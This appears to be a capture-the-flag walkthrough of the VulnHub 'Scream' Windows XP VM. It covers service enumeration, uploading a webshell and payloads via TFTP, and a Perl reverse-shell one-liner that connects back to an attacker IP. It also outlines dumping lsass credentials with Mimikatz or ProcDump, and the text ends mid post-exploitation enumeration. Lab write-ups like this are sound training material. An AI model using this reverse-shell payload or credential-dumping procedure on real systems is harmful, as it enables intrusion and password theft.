-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathVulnHub Scream (Beginner-Medium)
1545 lines (1208 loc) · 82 KB
/
VulnHub Scream (Beginner-Medium)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
=============================================================================================
Walkthrough of the /dev/random SCREAM VulnHub Windows VM CTF
=============================================================================================
The goal of this CTF is to recover the clear-text password of the current Windows account.
Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Searchsploit + manual tests)
+ FTP server (anonymous access, read-only privilege)
+ Freesshd server v.2.1.3 (prone to a known RCE vulnerability)
+ WarFTPd server v.1.65 (prone to a known RCE vulnerability)
+ TinyWeb HTTP server, TFTP server, Telnet
Step 2. Gaining access and Privilege escalation to 'NT AUTHORITY\SYSTEM'
Method 1 (easy/medium)
----------------------
1. Find out that it is possible to upload files in '/www/root/cgi-bin/' via the TFTP server and that the uploaded files can browsed ("http://192.168.1.11/cgi-bin/<file>")
2. Find out that PERL scripts stored in '/cgi-bin/' are executed (TinyWeb documentation and Internet blog posts)
3. Upload a Perl script (reverse shell) in '/cgi-bin/' and execute it (i.e. "curl http://192.168.1.11/cgi-bin/TinyWebRCE.pl")
4. Obtain a reverse shell running as the account 'alex' which is member of the local administrator group
5. Dump the clear-text password of the 'alex' account using one of the multiple methods available:
=> Option 1. Upload the tool Mimikatz via TFTP and then use it to elevate to 'NT AUTHORITY\SYSTEM'
and dump the clear-text password of the 'alex' account from memory (lsass).
=> Option 2. Upload the tools PsExec.exe and ProcDump.exe (Sysinternals) via TFTP and then use these tools to elevate to 'NT AUTHORITY\SYSTEM'
and dump the memory of the lsass process. Finally, use Mimikatz to extract offline the clear-text password of the 'alex' account.
=> Option 3. Disable the firewall (since we are local admin), then use a well known exploit such as ms08067 or ms17010 with metasploit to gain a 'SYSTEM' remote shell on this legacy Windows machine (XP)
and dump the clear-text password with the metasploit's mimikatz module.
=> ...
Method 2 (very easy)
--------------------
1. Exploit the "authentication bypass" vulnerability affecting the Freesshd server v. 2.1.3 using an old exploit available in Metasploit Msf4.
Notes:
- The new version of the exploit available in msf5 has been modified and it doesn't work against this Legacy Windows machine (XP).
- I tried several other exploits from ExploitDB, and GitHub but none of them worked (I spent time trying to debug them though..).
2. Obtain a reverse-shell (meterpreter) running with 'NT AUTHORITY\SYSTEM'
3. Dump the clear-text password of the 'alex' account from memory (lsass) with the metasploit's mimikatz module.
=============================================================================================
Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Searchsploit)
=============================================================================================
jeff@kali-Linux:~/Documents/CTFs/Scream$ sudo nmap -sS -sV -p- -sC 192.168.1.4
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-03 22:50 CEST
Service scan Timing: About 75.00% done; ETC: 22:52 (0:00:14 remaining)
Nmap scan report for 192.168.1.4
Host is up (0.00077s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp WAR-FTPD 1.65 (Name Scream XP (SP2) FTP Service)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 bin
| drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 log
|_drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 root
|_ftp-bounce: bounce working!
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh WeOnlyDo sshd 2.1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 2c:23:77:67:d3:e0:ae:2a:a8:01:a4:9e:54:97:db:2c (DSA)
|_ 1024 fa:11:a5:3d:63:95:4a:ae:3e:16:49:2f:bb:4b:f1:de (RSA)
23/tcp open telnet
| fingerprint-strings:
| GenericLines, NCP, RPCCheck, tn3270:
| Scream Telnet Service
| login:
| GetRequest:
| HTTP/1.0
| Scream Telnet Service
| login:
| Help:
| HELP
| Scream Telnet Service
| login:
| SIPOptions:
| OPTIONS sip:nm SIP/2.0
| Via: SIP/2.0/TCP nm;branch=foo
| From: <sip:nm@nm>;tag=root
| <sip:nm2@nm2>
| Call-ID: 50000
| CSeq: 42 OPTIONS
| Max-Forwards: 70
| Content-Length: 0
| Contact: <sip:nm@nm>
| Accept: application/sdp
| Scream Telnet Service
|_ login:
80/tcp open http Tinyweb httpd 1.93
|_http-server-header: TinyWeb/1.93
|_http-title: The Scream - Edvard Munch
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.70%I=7%D=4/3%Time=5E87A1F2%P=x86_64-apple-darwin13.4.0%r
SF:(NULL,12,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\
SF:xfd\x1f")%r(GenericLines,34,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x
SF:03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nScream\x20Telnet\x20Service\r\nlogin:
SF:\x20")%r(tn3270,3C,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xf
SF:d\x18\xff\xfd\x1f\xff\xfc\x18\xff\xfe\x19\xff\xfc\x19\xff\xfb\0Scream\x
SF:20Telnet\x20Service\r\nlogin:\x20")%r(GetRequest,42,"\xff\xfb\x01\xff\x
SF:fe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fGET\x20/\x20HTTP/1\.0
SF:\r\n\r\nScream\x20Telnet\x20Service\r\nlogin:\x20")%r(RPCCheck,5C,"\xff
SF:\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\x80\0\
SF:0\(r\xfe\x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0Scream\x20Telnet\x20Service\r\nlogin:\x20"
SF:)%r(Help,36,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\x
SF:ff\xfd\x1fHELP\r\nScream\x20Telnet\x20Service\r\nlogin:\x20")%r(SIPOpti
SF:ons,10F,"\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\x
SF:fd\x1fOPTIONS\x20sip:nm\x20SIP/2\.0\r\nVia:\x20SIP/2\.0/TCP\x20nm;branc
SF:h=foo\r\nFrom:\x20<sip:nm@nm>;tag=root\r\nTo:\x20<sip:nm2@nm2>\r\nCall-
SF:ID:\x2050000\r\nCSeq:\x2042\x20OPTIONS\r\nMax-Forwards:\x2070\r\nConten
SF:t-Length:\x200\r\nContact:\x20<sip:nm@nm>\r\nAccept:\x20application/sdp
SF:\r\n\r\nScream\x20Telnet\x20Service\r\nlogin:\x20")%r(NCP,31,"\xff\xfb\
SF:x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\x13Scream\x
SF:20Telnet\x20Service\r\nlogin:\x20");
MAC Address: 08:00:27:BC:49:7E (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ nikto -h 192.168.1.4
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.4
+ Target Hostname: 192.168.1.4
+ Target Port: 80
+ Start Time: 2020-04-04 23:56:05 (GMT2)
---------------------------------------------------------------------------
+ Server: TinyWeb/1.93
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2020-04-04 23:56:07 (GMT2) (2 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
jeff@kali-Linux:~/Documents/CTFs/Scream$ dirbuster http://192.168.1.4
Apr 04, 2020 11:56:40 PM java.util.prefs.FileSystemPreferences$1 run
INFO: Created user preferences directory.
Exception in thread "AWT-EventQueue-0" java.awt.HeadlessException:
No X11 DISPLAY variable was set, but this program performed an operation which requires it.
at java.desktop/java.awt.GraphicsEnvironment.checkHeadless(GraphicsEnvironment.java:208)
at java.desktop/java.awt.Window.<init>(Window.java:548)
at java.desktop/java.awt.Frame.<init>(Frame.java:423)
at java.desktop/java.awt.Frame.<init>(Frame.java:388)
at java.desktop/javax.swing.JFrame.<init>(JFrame.java:180)
at com.sittinglittleduck.DirBuster.gui.StartGUI.<init>(StartGUI.java:57)
at com.sittinglittleduck.DirBuster.Start$2.run(Start.java:357)
at java.desktop/java.awt.event.InvocationEvent.dispatch(InvocationEvent.java:313)
at java.desktop/java.awt.EventQueue.dispatchEventImpl(EventQueue.java:770)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:721)
at java.desktop/java.awt.EventQueue$4.run(EventQueue.java:715)
at java.base/java.security.AccessController.doPrivileged(Native Method)
at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(ProtectionDomain.java:85)
at java.desktop/java.awt.EventQueue.dispatchEvent(EventQueue.java:740)
at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(EventDispatchThread.java:203)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(EventDispatchThread.java:124)
at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(EventDispatchThread.java:113)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:109)
at java.desktop/java.awt.EventDispatchThread.pumpEvents(EventDispatchThread.java:101)
at java.desktop/java.awt.EventDispatchThread.run(EventDispatchThread.java:90)
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ telnet 192.168.1.4
Trying 192.168.1.4...
Connected to 192.168.1.4.
Escape character is '^]'.
Scream Telnet Service
login: user
password:
Login incorrect
login: root
password:
Login incorrect
login: user
password:
Login incorrect
Authentication failed!
Connection closed by foreign host.
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit WarFTP
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Jgaa WarFTPd 1.66 x4s/1.67-3 - 'CWD/MKD' Denial of Service | exploits/windows/dos/19740.c
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl) | exploits/windows/remote/3482.pl
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python) | exploits/windows/remote/3474.py
WarFTP 1.65 - 'USER' Remote Buffer Overflow | exploits/windows/remote/3570.c
WarFTP Daemon 1.82 RC 11 - Remote Format String | exploits/windows/dos/20957.pl
WarFTPd 1.82.00-RC11 - Remote Denial of Service | exploits/windows/dos/2735.py
WarFTPd 1.82.00-RC12 - 'LIST' Format String Denial of Service | exploits/windows/dos/9622.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit -x 3474
Exploit: WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)
URL: https://www.exploit-db.com/exploits/3474
Path: /usr/share/exploitdb/exploits/windows/remote/3474.py
File Type: Python script, ASCII text executable, with CRLF line terminators
jeff@kali-Linux:~/Documents/CTFs/Scream$ msfconsole
=[ metasploit v5.0.70-dev ]
+ -- --=[ 1960 exploits - 1094 auxiliary - 336 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > search warftp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/ftp/warftpd_165_pass 1998-03-19 average No War-FTPD 1.65 Password Overflow
1 exploit/windows/ftp/warftpd_165_user 1998-03-19 average No War-FTPD 1.65 Username Overflow
=====================
freeSSHd 2.1.3 - Remote Authentication Bypass
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit freeSSHd
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path | exploits/windows/local/48044.txt
freeSSHd - Denial of Service (PoC) | exploits/windows/dos/18268.txt
freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow | exploits/windows/remote/1787.py
freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) | exploits/windows/remote/16461.rb
freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Remote Denial of Service | exploits/linux/dos/31218.txt
freeSSHd 1.2.1 - 'rename' Remote Buffer Overflow (SEH) | exploits/windows/remote/8295.pl
freeSSHd 1.2.1 - (Authenticated) Remote Overflow (SEH) | exploits/windows/remote/5751.pl
freeSSHd 1.2.1 - (Authenticated) Remote Stack Overflow (PoC) | exploits/windows/dos/5709.pl
freeSSHd 1.2.1 - (Authenticated) SFTP 'realpath' Remote Buffer Overflow (PoC) | exploits/windows/dos/6812.pl
freeSSHd 1.2.1 - (Authenticated) SFTP 'rename' Remote Buffer Overflow (PoC) | exploits/windows/dos/6800.pl
freeSSHd 1.2.4 - Denial of Service | exploits/windows/dos/11842.py
freeSSHd 1.2.6 - Authentication Bypass (Metasploit) | exploits/windows/remote/24133.rb
freeSSHd 1.3.1 - Denial of Service | exploits/windows/dos/38001.py
freeSSHd 2.1.3 - Remote Authentication Bypass | exploits/windows/remote/23080.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
jeff@kali-Linux:~/Documents/CTFs/Scream$ searchsploit -x 23080
Exploit: freeSSHd 2.1.3 - Remote Authentication Bypass
URL: https://www.exploit-db.com/exploits/23080
Path: /usr/share/exploitdb/exploits/windows/remote/23080.txt
File Type: ASCII text, with CRLF line terminators
=====================
jeff@kali-Linux:~/Documents/CTFs/Scream$ ftp 192.168.1.4
Connected to 192.168.1.4.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (192.168.1.4:jeff): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> cd /
250 CWD successful. "/" is current directory.
ftp> dir
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 bin
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 log
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 root
ftp> cd root
250 CWD successful. "/root" is current directory.
ftp> dir
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Feb 08 2013 cgi-bin
---------- 1 ftp ftp 14539 Oct 31 2012 index.html
226 Transfer OK
ftp> put cmdasp.asp
local: cmdasp.asp remote: cmdasp.asp
200 Port command successful
550 Permission denied
ftp> cd cgi-bin
250 CWD successful. "/root/cgi-bin" is current directory.
ftp> dir
200 Port command successful
150 Opening data channel for directory list.
226 Transfer OK
ftp> put cmdasp.asp
local: cmdasp.asp remote: cmdasp.asp
200 Port command successful
550 Permission denied
226 Transfer OK
ftp>
ftp> cd log
250 CWD successful. "/log" is current directory.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
---------- 1 ftp ftp 23450 Apr 04 23:57 access_log
---------- 1 ftp ftp 12607 Apr 04 23:57 agent_log
---------- 1 ftp ftp 0 Apr 03 22:37 error_log
---------- 1 ftp ftp 674 Nov 01 2012 OpenTFTPServerMT.log
---------- 1 ftp ftp 249 Apr 04 23:57 referer_log
226 Transfer OK
ftp> get access_log
local: access_log remote: access_log
200 Port command successful
550 Permission denied
ftp> get agent_log
local: agent_log remote: agent_log
200 Port command successful
550 Permission denied
ftp> get error_log
local: error_log remote: error_log
200 Port command successful
550 Permission denied
ftp> get OpenTFTPServerMT.log
local: OpenTFTPServerMT.log remote: OpenTFTPServerMT.log
200 Port command successful
550 Permission denied
ftp> get referer_log
local: referer_log remote: referer_log
200 Port command successful
550 Permission denied
=====================
=> Since there is a file named "OpenTFTPServerMT.log", I checked if the TFTP port is open (UDP/69)..
jeff@kali-Linux:~/Documents/CTFs/Scream$ sudo nmap -sV -sU -p 69 192.168.1.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 01:15 CEST
Nmap scan report for 192.168.1.4
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
69/udp open tftp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port69-UDP:V=7.80%I=7%D=4/5%Time=5E891502%P=x86_64-pc-linux-gnu%r(DNSSt
SF:atusRequest,18,"\0\x05\0\x05Unknown\x20Transfer\x20Id\0");
MAC Address: F4:5C:89:C9:BE:C5 (Apple)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.06 seconds
=============================================================================================
Step 2. Gaining access and privilege escalation to 'NT AUTHORITY\SYSTEM'
=============================================================================================
----------------------------------------- Method 1 ------------------------------------------
=> I logged into the TFTP server and uploaded a webshell and a reverse shell.
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> ?
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet retransmission timeout
timeout set total retransmission timeout
? print help information
tftp> put cmdasp.asp
Sent 1581 bytes in 0.0 seconds
tftp> binary
tftp> put shell.exe
Sent 73802 bytes in 0.6 seconds
tftp> quit
=> Then I tried to browse the Website to find my files but it did not worked so i checked the FTP server...
jeff@kali-Linux:~/Documents/CTFs/Scream$ ftp 192.168.1.4
Connected to 192.168.1.4.
220- Scream XP (SP2) FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
Name (192.168.1.4:jeff): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 bin
drwxr-xr-x 1 ftp ftp 0 Apr 03 22:37 log
drwxr-xr-x 1 ftp ftp 0 Apr 05 00:35 root
226 Transfer OK
ftp> cd root
250 CWD successful. "/root" is current directory.
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
drwxr-xr-x 1 ftp ftp 0 Feb 08 2013 cgi-bin
---------- 1 ftp ftp 1636 Apr 05 00:35 cmdasp.asp
---------- 1 ftp ftp 14539 Oct 31 2012 index.html
---x--x--x 1 ftp ftp 73802 Apr 05 00:46 shell.exe
=> I re-uploaded my files using the TFTP server but this time I uploaded the files in the folder "/cgi-bin/"
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> ?
Commands may be abbreviated. Commands are:
connect connect to remote tftp
mode set file transfer mode
put send file
get receive file
quit exit tftp
verbose toggle verbose mode
trace toggle packet tracing
status show current status
binary set mode to octet
ascii set mode to netascii
rexmt set per-packet retransmission timeout
timeout set total retransmission timeout
? print help information
tftp> binary
tftp> put shell.exe
Sent 73802 bytes in 0.6 seconds
tftp> put /cgi-bin/shell.exe
Sent 73802 bytes in 0.5 seconds
tftp> put /cgi-bin/Test.txt
Sent 5 bytes in 0.0 seconds
tftp> put /cgi-bin/cmdasp.asp
Sent 1526 bytes in 0.0 seconds
tftp> quit
=> The ASP webshell and the meterpreter shell.exe still did not worked ('Access is denied').
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/shell.exe
[*] exec: curl http://192.168.1.4/cgi-bin/shell.exe
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: Access is denied</H1></BODY></HTML>
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/cmdasp.asp?cmd=dir
[*] exec: curl http://192.168.1.4/cgi-bin/cmdasp.asp?cmd=dir
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: Access is denied</H1></BODY></HTML>
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/test.txt
[*] exec: curl http://192.168.1.4/cgi-bin/test.txt
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: NOTEPAD.EXE is a GUI application</H1></BODY></HTML>
=> I found and followed a tutorial on the Internet that explaining how to execute a Perl script uploaded in the folder '/cgi-bin/' of a TinyWeb server.
My Perl script (reverse shell) looks like this:
jeff@kali-Linux:~/Documents/CTFs/Scream$ cat TinyWebRCE.pl
## CGI Testing Example
$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.1.34:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> put /cgi-bin/TinyWebRCE.pl
Sent 220 bytes in 0.1 seconds
tftp> quit
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/TinyWebRCE2.pl
<HTML><TITLE>500 Internal Server Error</TITLE><BODY><H1>Internal Server Error: Can't locate object method "new" via package "IO::Socket::INET" (perhaps you forgot to load "IO::Socket::INET"?) at c:\www\root\cgi-bin\TinyWebRCE2.pl line 2.
=> I modified my payload (several times) to finally make it work...
jeff@kali-Linux:~/Documents/CTFs/Scream$ cat TinyWebRCE4.pl
## CGI Testing Example
use IO::Socket::INET;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.1.34:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
jeff@kali-Linux:~/Documents/CTFs/Scream$ tftp 192.168.1.4
tftp> put /cgi-bin/TinyWebRCE4.pl
Sent 131 bytes in 0.3 seconds
tftp>
jeff@kali-Linux:~/Documents/CTFs/Scream$ curl http://192.168.1.4/cgi-bin/TinyWebRCE4.pl
curl: (52) Empty reply from server
=> I got a reverse shell :-)
jeff@kali-Linux:~$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.1.34] from (UNKNOWN) [192.168.1.4] 1043
dir
Volume in drive C has no label.
Volume Serial Number is 8080-53D6
Directory of c:\www\root\cgi-bin
04/05/2020 04:23 AM <DIR> .
04/05/2020 04:23 AM <DIR> ..
04/05/2020 01:52 AM 1,526 cmdasp.asp
04/05/2020 01:51 AM 73,802 shell.exe
04/05/2020 02:05 AM 73 shell.pl
04/05/2020 01:51 AM 5 Test.txt
04/05/2020 03:53 AM 224 TinyWebRCE.pl
04/05/2020 04:04 AM 156 TinyWebRCE2.pl
04/05/2020 04:09 AM 133 TinyWebRCE3.pl
04/05/2020 04:12 AM 133 TinyWebRCE4.pl
<snip>
hostname
Scream
cmd
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\www\root\cgi-bin>whoami
c:\www\root\cgi-bin>net user
User accounts for \\SCREAM
-------------------------------------------------------------------------------
Administrator alex Guest
HelpAssistant SUPPORT_388945a0
The command completed successfully.
C:\www\root\cgi-bin>qwinsta
SESSIONNAME USERNAME ID STATE TYPE DEVICE
>console alex 0 Active wdcon
c:\www\root\cgi-bin>net user alex
User name alex
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/3/2020 11:35 PM
Password expires 5/16/2020 10:23 PM
Password changeable 4/3/2020 11:35 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/5/2020 3:02 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
C:\www\root\cgi-bin>cd C:\
C:\>tasklist /v
Image Name PID Session Name Session# Mem Usage Status User Name CPU Time Window Title
========================= ====== ================ ======== ============ =============== ================================================== ============ ========================================================================
System Idle Process 0 Console 0 16 K Running NT AUTHORITY\SYSTEM 1:56:42 N/A
System 4 Console 0 536 K Running NT AUTHORITY\SYSTEM 0:00:11 N/A
smss.exe 512 Console 0 372 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
csrss.exe 576 Console 0 3,492 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
winlogon.exe 600 Console 0 5,652 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
services.exe 644 Console 0 3,088 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
lsass.exe 656 Console 0 1,328 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 812 Console 0 4,512 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 892 Console 0 3,960 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 988 Console 0 17,140 K Running NT AUTHORITY\SYSTEM 0:00:03 N/A
svchost.exe 1044 Console 0 3,300 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
svchost.exe 1148 Console 0 4,152 K Running NT AUTHORITY\LOCAL SERVICE 0:00:00 N/A
avgchsvx.exe 1256 Console 0 792 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
avgrsx.exe 1264 Console 0 644 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
spoolsv.exe 1476 Console 0 4,252 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
avgcsrvx.exe 1504 Console 0 13,684 K Running NT AUTHORITY\SYSTEM 0:00:01 N/A
explorer.exe 1616 Console 0 12,552 K Running SCREAM\alex 0:00:00 N/A
